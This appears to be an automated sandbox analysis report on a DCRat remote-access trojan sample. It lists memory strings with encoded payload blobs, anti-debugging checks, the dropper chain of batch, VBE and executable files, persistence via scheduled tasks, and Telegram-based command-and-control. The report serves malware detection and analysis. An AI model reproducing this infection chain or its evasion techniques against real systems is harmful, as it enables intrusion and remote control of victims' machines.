Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012489000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: SurrogatewebSession.exe, 00000008.00000002.1740551544.000000001C098000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: gp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: work.exe, 00000003.00000002.1631802705.0000000002CCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&0@
Source: wscript.exe, 00000005.00000002.1664665110.0000000002D6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
Source: SurrogatewebSession.exe, 00000008.00000002.1740585685.000000001C0B9000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1785246422.000001FA32E09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A40A0A
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h] 0_2_00A491B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003391B0 mov eax, dword ptr fs:[00000030h] 3_2_003391B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00747DEE mov eax, dword ptr fs:[00000030h] 4_2_00747DEE
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4D1F0 GetProcessHeap, 0_2_00A4D1F0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A40A0A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40B9D SetUnhandledExceptionFilter, 0_2_00A40B9D
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00A40D8A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A44FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00330A0A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330B9D SetUnhandledExceptionFilter, 3_2_00330B9D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00330D8A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00334FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00334FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0073F838
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F9D5 SetUnhandledExceptionFilter, 4_2_0073F9D5
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0073FBCA
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00748EBD
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class73.cs Reference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class74.cs Reference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, AFA.cs Reference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 | A86.U14.flag_1, A86.OkN.flag_2)
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree, 0_2_00A3BEFF
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40826 cpuid 0_2_00A40826
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00A3C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: GetLocaleInfoW,GetNumberFormatW, 3_2_0032C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_0073AF0F
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Queries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Queries volume information: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Recovery\winlogon.exe VolumeInformation
Source: C:\Recovery\winlogon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2C365 GetVersionExW, 0_2_00A2C365
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417539 Sample: H9gMIu2HXi.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 100 api.telegram.org 2->100 102 ipinfo.io 2->102 108 Snort IDS alert for network traffic 2->108 110 Antivirus detection for dropped file 2->110 112 Multi AV Scanner detection for dropped file 2->112 116 12 other signatures 2->116 14 H9gMIu2HXi.exe 14 2->14         started        17 winlogon.exe 2->17         started        19 winlogon.exe 2->19         started        22 6 other processes 2->22 signatures3 114 Uses the Telegram API (likely for C&C communication) 100->114 process4 file5 82 C:\Users\user\AppData\Local\Temp\...\work.exe, PE32 14->82 dropped 24 cmd.exe 1 14->24         started        84 C:\Users\user\Desktop\tRVOBpwv.log, PE32 17->84 dropped 86 C:\Users\user\Desktop\rGzNBWQu.log, PE32 17->86 dropped 88 C:\Users\user\Desktop\aEtIhTbg.log, PE32 17->88 dropped 90 3 other malicious files 17->90 dropped 26 cmd.exe 17->26         started        118 Antivirus detection for dropped file 19->118 120 Multi AV Scanner detection for dropped file 19->120 122 Machine Learning detection for dropped file 19->122 signatures6 process7 process8 28 work.exe 13 24->28         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        file9 80 C:\Users\user\AppData\Local\...\dwartg.exe, PE32 28->80 dropped 134 Multi AV Scanner detection for dropped file 28->134 36 dwartg.exe 3 10 28->36         started        signatures10 process11 file12 74 C:\Users\user\...\SurrogatewebSession.exe, PE32 36->74 dropped 76 C:\Users\user\AppData\Roaming\...\xIIr5uE.vbe, data 36->76 dropped 124 Antivirus detection for dropped file 36->124 126 Multi AV Scanner detection for dropped file 36->126 128 Machine Learning detection for dropped file 36->128 40 wscript.exe 1 36->40         started        signatures13 process14 signatures15 132 Windows Scripting host queries suspicious COM object (likely to drop second stage) 40->132 43 cmd.exe 1 40->43         started        process16 process17 45 SurrogatewebSession.exe 23 29 43->45         started        50 conhost.exe 43->50         started        dnsIp18 104 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 45->104 106 ipinfo.io 34.117.186.192, 443, 49730, 49731 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 45->106 92 C:\Users\user\Desktop\vybNluDs.log, PE32 45->92 dropped 94 C:\Users\user\Desktop\tnEMlbYs.log, PE32 45->94 dropped 96 C:\Users\user\Desktop\lKwWBiIK.log, PE32 45->96 dropped 98 10 other malicious files 45->98 dropped 136 Antivirus detection for dropped file 45->136 138 Multi AV Scanner detection for dropped file 45->138 140 Creates an undocumented autostart registry key 45->140 142 4 other signatures 45->142 52 csc.exe 45->52         started        56 cmd.exe 45->56         started        58 schtasks.exe 45->58         started        60 17 other processes 45->60 file19 signatures20 process21 file22 78 C:\Windows\...\SecurityHealthSystray.exe, PE32 52->78 dropped 130 Infects executable files (exe, dll, sys, html) 52->130 62 conhost.exe 52->62         started        64 cvtres.exe 52->64         started        66 conhost.exe 56->66         started        68 chcp.com 56->68         started        70 w32tm.exe 56->70         started        72 SurrogatewebSession.exe 56->72         started        signatures23 process24
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipinfo.io/country false
    		high
